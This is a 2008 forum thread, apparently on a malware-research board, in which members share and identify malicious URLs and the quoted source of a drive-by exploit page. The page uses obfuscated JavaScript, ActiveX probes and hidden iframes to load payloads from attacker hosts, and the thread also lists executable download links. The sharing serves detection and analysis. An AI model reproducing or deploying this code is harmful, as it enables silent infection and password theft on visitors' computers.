Author Topic: xia.qisihuisheng.net/mm  (Read 5328 times)

0 Members and 1 Guest are viewing this topic.

March 28, 2008, 12:07:07 pm
Read 5328 times

pcaccent

  • Special Access
  • Sr. Member

  • Offline
  • *

  • 190
Quote
document.write("<iframe width=0 height=0 src=hxxp://web.shijiediyi.net/wm/og.htm></iframe>")
        hxxp://xia.qisihuisheng.net/mm/ogame.exe

61F5C358-60FB-4A23-A312-D2B556620F20

??????????????
Quote
hxxp://aaa.faba01.com/hao104.htm
        hxxp://aaa.faba01.com/index.htm

vvv.2117966.net/fuckjp.js ?????????

Quote
<iframe src="hxxp://aaa.faba01.com/wm/614.htm" width=100 height=0></iframe>
<iframe src="hxxp://aaa.faba01.com/wm/real.htm" width=100 height=0></iframe>
<Html>
<Body>
<script language="javaScript">
function init(){document.write();}
window.onload = init;
if(document.cookie.indexOf('Cuteqqsx')==-1){
var ids="clsid:BD9";
var idss="6C556-65A3-11D";
var idsss="0-983A-00C04FC29E36";
var idx=ids+idss+idsss;
try{
var e;
var ado=(document["createElement"]("object"));
ado["setAttribute"]("classid",idx);
var as=window["ado"]["createobject"]("A"+"d"+"o"+"d"+"b."+"S"+"t"+"r"+"e"+"a"+"m","")}
catch(e){};
finally{
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie='Cuteqqsx=qq784378237s;path=/;expires='+expires.toGMTString();
if(e!="[object Error]"){
document.write("<script src=hxxp://aaa.faba01.com/wm/Ajax.gif><\/script>")
document.write("<iframe width='0' height='0' src='hxxp://aaa.faba01.com/wm/614.htm'></iframe>")}
else{
try{var r;var reals=new window["ActiveXObject"]("IERPCtl.IERPCtl.1");}
catch(r){};
finally{if(r!="[object Error]"){
document.write("<script src=hxxp://aaa.faba01.com/wm/Real.js><\/script>")}}
try{var g;var storm=new window["ActiveXObject"]("MPS.StormPlayer");}
catch(g){};
finally{if(g!="[object Error]"){
document.write("<script src=hxxp://aaa.faba01.com/wm/Bfyy.gif><\/script>")}}
try{var i;var thunder=new window["ActiveXObject"]("DPClient.Vod");}
catch(i){};
finally{if(i!="[object Error]"){
document.write("<script src=hxxp://aaa.faba01.com/wm/XunLei.gif><\/script>")}}
try{var j;var lianzhong=new window["ActiveXObject"]("GLCHAT.GLChatCtrl.1");}
catch(j){};
finally{if(j!="[object Error]"){
document.write("<script src=hxxp://aaa.faba01.com/wm/Lz.gif><\/script>")}
if(r=="[object Error]"&&g=="[object Error]"&&i=="[object Error]"&&j=="[object Error]"){
document.write("<iframe width='0' height='0' src='hxxp://aaa.faba01.com/wm/QVod.html'></iframe>")}}
}}}
var loouen="niuniu";
</script>
</Body>
</Html>

March 28, 2008, 12:31:46 pm
Reply #1

sowhat-x

  • Guest
Quote
??????????????
You mean what is '61F5C358-60FB-4A23-A312-D2B556620F20'?
It's the CLSID of 'Ourgame GLWorld'...there was an exploit released related to this one:
http://www.frsirt.com/english/advisories/2008/0427

Regarding the infected html,way far better explanations than what I can give,
in the links mentioned in this thread:
http://www.castlecops.com/t217351-Password_stealing_mass_attack_in_progress.html

By the way,googling for 'QVod.html','cuteqq.htm' and the like,still returns quite a few results...

March 29, 2008, 12:19:22 am
Reply #2

pcaccent

  • Special Access
  • Sr. Member

  • Offline
  • *

  • 190
Thank you   ;D ;D ;D

Quote
hxxp://count.lljy.org/b/myself.exe
hxxp://count.lljy.org/b/servstr.exe
hxxp://count.lljy.org/b/8.exe